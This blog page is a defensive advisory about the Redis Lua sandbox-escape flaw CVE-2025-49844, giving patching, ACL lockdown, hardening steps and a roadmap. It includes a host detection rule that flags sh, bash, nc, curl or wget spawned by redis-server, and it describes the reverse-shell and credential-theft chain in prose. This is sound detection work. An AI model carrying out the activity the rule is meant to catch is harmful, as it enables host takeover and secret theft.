Skip to main content

Latest Cybersecurity News

How to Find if Your Google, Apple, or GitHub Login Was in the Billion-Credential Dump (Free Checker).

Author: CyberDudeBivash Powered by: CyberDudeBivash Brand | cyberdudebivash.com Related: cyberbivash.blogspot.com CISO Briefing: How to Find if Your Google, Apple, or GitHub Login Was in the "Credpocalypse" Billion-Credential Dump (Free Checker) — by CyberDudeBivash By CyberDudeBivash · 01 Nov 2025 · cyberdudebivash.com · Intel on cyberbivash.blogspot.com LinkedIn: ThreatWire cryptobivash.code.blog CREDENTIAL STUFFING • COMBOLIST • HIBP • MFA Situation: A massive "combolist" (a combination list of email/password pairs) containing billions of credentials from *thousands* of old breaches has been released on the dark web. This is not a "new hack." It is a "Credpocalypse" dump that attackers are now using for widespread credential stuffing attacks. This is a decision-grade brief. Your password for Google, Apple, and GitHub —the "master keys...
Post a Comment

RediShell RCE Vulnerability Threatens Application Data and Memory Caches

CYBERDUDEBIVASH


Author: CyberDudeBivash
Powered by: CyberDudeBivash Brand | cyberdudebivash.com
Related: cyberbivash.blogspot.com

Published by CyberDudeBivash • Date: Nov 1, 2025 (IST)

RediShell RCE Vulnerability Threatens Application Data and Memory Caches

RediShell (CVE-2025-49844) is a critical Redis flaw in the Lua engine that enables a sandbox escape and remote code execution on the host. Redis 8.2.2 ships the fix; thousands of internet-exposed instances remain at risk. Immediate upgrades and scripting lockdowns are essential. 

TL;DR — What Teams Must Do in 60 Seconds

  • Patch now: Upgrade Redis to 8.2.2 (fix) or managed provider’s patched baseline; Valkey users to 8.1.4
  • If you can’t patch today: Disable Lua (revoke EVAL/EVALSHA via ACLs) and block unauthenticated access immediately. 
  • Hunt for compromise: Look for unexpected Lua scripts, Redis crashes from Lua stack traces, and shell-like outbound traffic from redis-server

1) What Is RediShell (CVE-2025-49844)?

RediShell is a use-after-free bug in the Redis Lua scripting subsystem that lets an authenticated attacker craft a Lua script to manipulate the garbage collector, escape the sandbox, and execute arbitrary code on the host. The issue existed for ~13 years and received a critical rating (CVSS ~9.9–10). Fixed in Redis 8.2.2.

Research shows the exploit chain can end in a reverse shell, with credential theft (.ssh, cloud tokens) and full host takeover possible—particularly dangerous where Redis runs with broad file/network access.

2) Why It Threatens App Data, Caches & Queues

  • In-memory ≠ safe: Attackers with host RCE can read/write sensitive keys, JWTs, and session data stored in Redis, sabotaging auth and privacy controls.
  • Queue/stream poisoning: RCE enables tampering with streams (e.g., XADD/XREADGROUP) and pub/sub, driving fraudulent workflows or data loss.
  • Blast radius: Many Redis nodes are internet-exposed or lack auth; estimates show tens of thousands vulnerable, with hundreds of thousands publicly reachable. 
  • Cloud impact: Providers issued patches/maintenance windows; self-hosted fleets must act immediately. 

3) Detections & Hunts (Host, Network, Redis)

Host / EDR

# Suspicious child of redis-server (Linux auditd / Sysmon for Linux)
ParentImage = "*redis-server*" AND
(NewProcessName in ("*/sh","*/bash","*/dash","*/nc","*/curl","*/wget") OR
 CommandLine like "%exec%/%bin%/%sh%")

Network

  • Outbound connections from redis-server to first-seen IPs/ports (reverse shell behavior). 
  • Spikes in large EVAL/EVALSHA payloads or unusual Lua script lengths in Redis traffic.

Redis Telemetry

  • Log/alert on unexpected scripting commands (EVAL, EVALSHA) and unknown scripts in SCRIPT LIST
  • Watch for crashes with Lua stack traces in Redis logs and unexplained restarts. 

4) Mitigations & Hardening (Do These Now)

  1. Patch/Upgrade: Redis 8.2.2 (fix); Valkey 8.1.4. Confirm your managed service’s patched versions. 
  2. Disable Lua if possible: Revoke EVAL/EVALSHA via ACLs or disable scripting for non-admin roles until fully patched. 
  3. Require authentication: Enforce strong ACL users; never expose Redis directly to the internet; bind to localhost/VPC; restrict with firewalls.
  4. Principle of least privilege: Run redis-server as a non-privileged user; drop capabilities; isolate with containers/SELinux/AppArmor.
  5. Secrets hygiene: Assume tokens/keys in Redis may be compromised; rotate app secrets, JWT signing keys, and SSH credentials if intrusion suspected.
  6. Monitoring: Add alerts for scripting attempts, odd child processes, and outbound sockets from redis-server. Keep long-term logs for IR.

5) 30-60-90-Day Cache-Security Roadmap

  1. 30 Days: Patch all Redis/Valkey nodes; enforce ACLs; remove public exposure; baseline CONFIG GET * across fleets.
  2. 60 Days: Introduce proxy sidecars (e.g., TLS-terminating gateway), rotate secrets, and implement SIEM content for Lua/script anomalies.
  3. 90 Days: Chaos-test: simulate disabled scripting vs. app behavior; adopt managed offerings with auto-patch SLAs; formalize IR playbook for cache compromise.

FAQ

What versions are affected?

All Redis versions with Lua scripting are impacted up to 8.2.1. The fix is in 8.2.2

Is authentication required to exploit?

Yes—authenticated access is needed to run Lua. However, many Redis servers are misconfigured without auth or are exposed publicly, making exploitation practical. :

Are there signs of active exploitation?

Research and advisories emphasize the risk and provide IoCs and behaviors (reverse shells, anomalous Lua) to monitor; treat any internet-exposed, unpatched instance as high-risk. 

Sources

  • Redis — Security Advisory for CVE-2025-49844 (patch & indicators). 
  • Wiz Research — Redis Lua sandbox escape to host RCE (“RediShell”). 
  • Sysdig — CVSS 10.0 analysis and defender guidance. 
  • NVD — CVE-2025-49844 entry (fixed in 8.2.2; Lua disabled workaround). 
  • Dark Reading — Cloud-wide exposure estimates and urgency. 
  • TechRadar Pro — Patch guidance and internet-exposed counts context. 
  • Render — Managed service patch plan (Redis 6.2.20 / Valkey 8.1.4). 
  • FortiGuard & Hive Pro — Threat summaries and mitigations. 

CyberDudeBivash — Services, Apps & Ecosystem

  • Cache & Queue Security Reviews (Redis/Valkey, Memcached, RabbitMQ)
  • Detection Engineering (Lua/script anomaly rules, SIEM content, EDR tuning)
  • Incident Response (reverse-shell containment, key rotation, hardening)

Apps & Products · Consulting & Services · ThreatWire Newsletter · CyberBivash (Threat Intel) · News Portal · CryptoBivash

Labels:

Comments

Post a Comment

Popular posts from this blog

CYBERDUDEBIVASH-BRAND-LOGO

CyberDudeBivash Official Brand Logo This page hosts the official CyberDudeBivash brand logo for use in our cybersecurity blogs, newsletters, and apps. The logo represents the CyberDudeBivash mission — building a global Cybersecurity, AI, and Threat Intelligence Network . The CyberDudeBivash logo may be embedded in posts, banners, and newsletters to establish authority and reinforce trust in our content. Unauthorized use is prohibited. © CyberDudeBivash | Cybersecurity, AI & Threat Intelligence Network cyberdudebivash.com
Post a Comment
Read more

CyberDudeBivash Rapid Advisory — WordPress Plugin: Social-Login Authentication Bypass (Threat Summary & Emergency Playbook)

  TL;DR: A class of vulnerabilities in WordPress social-login / OAuth plugins can let attackers bypass normal authentication flows and obtain an administrative session (or create admin users) by manipulating OAuth callback parameters, reusing stale tokens, or exploiting improper validation of the identity assertions returned by providers. If you run a site that accepts social logins (Google, Facebook, Apple, GitHub, etc.), treat this as high priority : audit, patch, or temporarily disable social login until you confirm your plugin is safe. This advisory gives you immediate actions, detection steps, mitigation, and recovery guidance. Why this matters (short) Social-login plugins often accept externally-issued assertions (OAuth ID tokens, authorization codes, user info). If the plugin fails to validate provider signatures, nonce/state values, redirect URIs, or maps identities to local accounts incorrectly , attackers can craft requests that the site accepts as authenticated. ...
Post a Comment
Read more

MICROSOFT 365 DOWN: Global Outage Blocks Access to Teams, Exchange Online, and Admin Center—Live Updates

       BREAKING NEWS • GLOBAL OUTAGE           MICROSOFT 365 DOWN: Global Outage Blocks Access to Teams, Exchange Online, and Admin Center—Live Updates         By CyberDudeBivash • October 09, 2025 • Breaking News Report         cyberdudebivash.com |       cyberbivash.blogspot.com           Share on X   Share on LinkedIn   Disclosure: This is a breaking news report and strategic analysis. It contains affiliate links to relevant enterprise solutions. Your support helps fund our independent research. Microsoft's entire Microsoft 365 ecosystem is currently experiencing a major, widespread global outage. Users around the world are reporting that they are unable to access core services including **Microsoft Teams**, **Exchange Online**, and even the **Microsoft 365 Admin Center**. This is a developing story, and this report w...
Post a Comment
Read more
Powered by CyberDudeBivash